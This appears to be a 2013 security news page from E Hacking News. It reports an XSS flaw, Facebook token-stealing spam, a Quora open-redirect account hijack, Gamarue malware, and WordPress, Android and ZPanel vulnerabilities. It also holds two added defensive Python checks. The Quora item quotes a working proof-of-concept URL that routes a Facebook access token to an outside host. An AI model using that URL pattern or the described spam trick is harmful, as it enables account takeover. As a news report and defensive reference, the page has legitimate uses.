E Hacking News
Security researcher Vedachala has discovered a POST-based cross-site scripting (XSS) vulnerability in the website of Defencely, a company that provides web application penetration testing services.

The main page of Defencely lets users enter their website address to get a security report. The form takes the input and passes the website address as the "website_url" parameter to "Defencely.com/report_submit.php".

"If a web application is getting user's input, it is always better to double check and make sure the parameter is sanitized." 

Post based xss in Defencely

Veda has identified that the "website_url" parameter is not sanitized and is vulnerable to POST request-based XSS. He successfully got the injected script to execute.

In one of the Facebook groups related to security, the researcher provided the proof of concept (you can also find the details at pastebin.com/9JeJ1HK6). We have successfully verified the vulnerability. At the time of writing, the website is still vulnerable.

A new spam that preys on people's curiosity is circulating on Facebook. Today, E Hacking News came across a new spam campaign. The spam post has a picture of women that looks like a video.

"she went inclusively nuts and lost all control of the razor-sharp axe Well, Watch what happened..in..this..video:_:: [Tiny_URL]" The spam post reads.


Facebook spam post


Following the link provided in the post takes users to a page that says "She did this at the tender of age 15" and displays an image mimicking an embedded video player.

After clicking the image, I am really inspired by the clever work done by the cybercriminals. When a user clicks the image, it asks the user to press three shortcuts one by one: Ctrl+L, Ctrl+C, Ctrl+W.

I know what the last two shortcuts do but was not sure about the first one. I've managed to find the usage of the Ctrl+L shortcut in browsers. It is used for selecting the URL.

So the shortcuts are for selecting and copying the URL and closing the window. But wait a second, I failed to notice one thing. When I clicked the image, the page opened a new window.

Small window -1

Small window  -2


Interestingly, the new window is so small that it is not visible. So pressing the shortcut keys copies the URL of the new window and closes the window. The URL contains the victim's authentication token.

Victims who fail to notice the window and follow the instructions soon fall victim to the Facebook spam post. The spam will be posted on the victims' walls using the hijacked authentication token.


E Hacking News is glad to announce Defcon Bangalore 2013, the place where the top Indian security researchers present their research on information security.

Defcon Bangalore is a part of Defcon Community Groups with the registered ID DC9180. The team is supported by Cyber Security and Privacy Foundation, and provides a platform for talents in the Indian hacking community to showcase their research to a wider audience. The core team of Defcon Bangalore comprises Mr. Karthik, Mr. HariKrishnan and Mr. J Prasanna (Founder, Cyber Security & Privacy Foundation).

Submit your research papers:

The call for papers is open. Security researchers are invited to submit their research papers to defconbangalore@cysecurity.org. The call for papers will close on 25th July 2013.


Training:
This year, the DEFCON Bangalore team has initiated free training sessions for attendees as part of the meet! The charges incurred by attendees are under 20 USD per head; this is collected to pay for the space at a 5-star boutique hotel for the entire day, including snacks, high tea and lunch. Apart from this, no other charges are collected from attendees.

Cybercriminals have reportedly targeted the salary accounts of Mumbai Police and managed to withdraw money from the accounts.

According to an NDTV report, cybercriminals managed to withdraw money from the Axis Bank accounts of at least 14 policemen from ATMs in Greece.

It appears hackers in Greece carried out this heist by cloning the ATM cards of policemen in Mumbai.

At this time, there is no further information about how much money has been withdrawn and how many policemen have been affected by this heist.

The Mumbai police have formed a team to investigate the hack, and the bank has been asked to investigate.

An Indian security researcher, Prakhar Prasad, has found a way to hack Facebook accounts by exploiting an open redirection flaw in Quora, one of the famous question-and-answer websites.

Quora allows users to sign up through their Facebook account. While signing up for Quora, the researcher noticed that quora.com was permitted to receive an access token from Facebook OAuth.

Prasad managed to steal the access token from the Quora website by exploiting an open-redirect security flaw in quora.com.

POC provided by the researcher:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

"Facebook OAuth authorization URL requests token permission from the user, but as user will have Quora App installed, it will redirect to value specified in next parameter of OAuth authorization URL with a valid access_token" researcher said in his blog.

In this case, the next parameter's value is "https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora". So the request redirects the user to the above URL with the access token, which in turn redirects to Prasad's page (exploiting the open-redirect flaw). The page created by Prasad captures the access token and directs users to facebook.com.

Unwitting users who follow the POC link soon find themselves victims of the Facebook account hack.

Complete technical details can be found in his personal blog.

Quora patched the security flaw a few days after Prasad reported the bug.
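
The missing server-side check on the "goto" parameter can be sketched as follows. This is an added example, not Quora's code or the researcher's; the host allow-list and the function names are assumptions, and it is run here against the "next" value quoted above.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: the only hosts this site is willing to redirect to.
ALLOWED_HOSTS = {"www.quora.com", "quora.com"}

def safe_redirect_target(goto, default="/"):
    """Return goto only if it keeps the browser on this site, else default."""
    if not goto or goto != goto.strip():
        return default
    # Browsers read "\" as "/" and drop tabs/newlines, so refuse them outright.
    if any(ch in goto for ch in "\\\t\r\n"):
        return default
    try:
        parts = urlsplit(goto)
    except ValueError:  # e.g. malformed IPv6 literal
        return default
    if not parts.scheme and not parts.netloc:
        # Relative reference: rooted paths only. A leading "//" (or "///")
        # is resolved by browsers as a host name, so it is rejected.
        if goto.startswith("/") and not goto.startswith("//"):
            return goto
        return default
    # Absolute URL: https, allow-listed host, no "user@host" confusion.
    if (parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS
            and "@" not in parts.netloc):
        return goto
    return default

def goto_from(url):
    """Extract the goto parameter from a /contacts/skip style URL."""
    return parse_qs(urlsplit(url).query).get("goto", [""])[0]

# The value of "next" quoted in the article.
NEXT_FROM_ARTICLE = ("https://www.quora.com/contacts/skip"
                     "?goto=http://poc.prakharprasad.com/quora")

if __name__ == "__main__":
    print("article value ->", safe_redirect_target(goto_from(NEXT_FROM_ARTICLE)))
    for candidate in ("/inbox", "//example.net/x", "https://www.quora.com/about"):
        print(candidate, "->", safe_redirect_target(candidate))
```

With this check in place, the off-site "goto" value falls back to the default path, so the access token appended by the OAuth redirect never leaves the site.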
 
One of the leading source code repositories, SourceForge, has been found to be abused by cybercriminals to host malicious files that are later used by the Gamarue malware.

In their malware analysis report, TrendMicro researchers said they found a new variant that downloads malicious components from the SourceForge website.

The report says the malicious files were hosted under a SourceForge project called "tradingfiles". The cybercriminal who created the project has also created two other projects that were used to host the malicious components of Gamarue: ldjfdkladf and stanteam.

Once it infects the victim's machine, the malware allows cybercriminals to control the system and use it to launch attacks on other victims. It is also designed to steal information.

The malware finds its way into the victim's system through infected USB drives or an infected webpage that serves an exploit kit.

Every time Apple attempts to improve security in a new version of iOS, it ends up with a new security bug.

Here comes another iPhone hack to bypass the iOS lock screen. A Spanish iPhone user sent a video to Forbes showing how to hack the iOS 7 beta version to bypass the iPhone lock screen.

The security bug can be easily reproduced by going to the iOS Control Room, accessing the phone's calculator and then accessing the phone's camera. It is said that the bug allows deleting and sharing the photos.

The bug has been confirmed by Forbes. iOS 7 is still in beta, so it's only available to those with developer accounts.

Earlier this year, we became aware that Vulnerability-Lab discovered an iOS lock screen vulnerability that allowed anyone to access the data stored on the device.

A security researcher, Krzysztof Katowicz-Kowalewski, has discovered a critical DoS vulnerability in the latest version of WordPress (v3.5.1) that allows cybercriminals to cause a denial of service.

The security flaw is "caused due to an error when calculating the hash cycle count within the "crypt_private()" method in /wp-includes/class-phpass.php", according to the Secunia report.

By sending a specially crafted password cookie, an attacker can cause damage to the website. However, the exploit is limited to websites that have at least one password-protected post, and the attacker must know the URL of that post.

Secunia has confirmed that the vulnerability exists in the latest version, 3.5.1. Previous versions might also be impacted by the security bug.

The researcher informed the WordPress security team about the security flaw, but since he didn't receive any response from them, he decided to disclose the bug.
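
A defensive check for this class of bug, as an added example that is not WordPress or phpass code: in the portable phpass format the fourth character of the hash string encodes log2 of the cycle count, so a hash string arriving from a client should be structurally validated and pinned to the cost the server itself issues before any hashing starts. The function names, the `expected_log2` value and the sample strings are assumptions constructed for illustration.

```python
# phpass base64 alphabet; a character's position is the value it encodes.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

PORTABLE_PREFIXES = ("$P$", "$H$")
PORTABLE_LENGTH = 34  # 3 prefix + 1 cost + 8 salt + 22 digest characters


def phpass_cost_log2(stored):
    """Return log2 of the cycle count encoded in a portable phpass hash,
    or None if the string is not a well-formed portable hash."""
    if not isinstance(stored, str) or len(stored) != PORTABLE_LENGTH:
        return None
    if stored[:3] not in PORTABLE_PREFIXES:
        return None
    if any(ch not in ITOA64 for ch in stored[3:]):
        return None
    return ITOA64.index(stored[3])


def should_verify(stored, expected_log2=13):
    """Gate in front of the hash routine: proceed only when the client-held
    string carries exactly the cost this server issues (assumed 2**13 here).
    Anything else is rejected without running a single hash cycle."""
    return phpass_cost_log2(stored) == expected_log2


if __name__ == "__main__":
    # Constructed samples: correct cost, inflated cost, malformed string.
    for sample in ("$P$B" + "a" * 30, "$P$K" + "a" * 30, "not-a-hash"):
        cost = phpass_cost_log2(sample)
        print(sample[:4], "cost_log2 =", cost, "verify =", should_verify(sample))
```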

The Android operating system is based on Linux, which means vulnerabilities affecting the Linux kernel may also be exploitable on the Android platform.

It appears the recently discovered Linux local kernel privilege escalation vulnerability (CVE-2013-2094) affects the Android operating system.

According to Symantec researchers, the exploit for the kernel vulnerability has now been modified to work on the Android platform. The security flaw allows a hacker to gain complete control of infected devices.

The researchers have warned that malware will take advantage of this exploit to access data from other apps, prevent users from uninstalling the malware, and send premium-rate SMS messages.

We are not sure how much time Google will take to patch the bug. So, users are advised to download apps only from trusted marketplaces.

A critical remote code execution vulnerability has been identified in ZPanel that allows hackers to reset the root password and gain access to the server.

According to the forum post, the latest stable version, 10.0.2, is also affected by this security flaw. The user has also provided the steps to reproduce the vulnerability.


The security flaw exists in the ZPX HTPASSWD module because the module fails to sanitize user input. The flaw allows anyone with access to the page, including admins, resellers and clients, to inject arbitrary shell commands into the server.

The vulnerability has been confirmed by ZPanel Head Developer & Project Leader Bobby Allen. ZPanel users are advised to disable the HTPASSWD module.

The team is currently testing the patched file, which was committed to GitHub. They have promised to issue a manual patch once the test is completed.
Funded by

Cyber Security and Privacy Foundation:


EHacking news is funded by Cyber Security and Privacy Foundation.
http://cysecurity.org

Get Latest news at Your Email

Enter Your Email:


    
TwitterAdd me in Google +
RSS Subscribe to our RSS Feeds!
TwitterFollow Us on Twitter!
Sponsored Links:
DMCA.com
  • Funny Forward Mails
  • Debugging Questions in Java
COPYRIGHT 2012 by EHN. | Read our Privacy Policy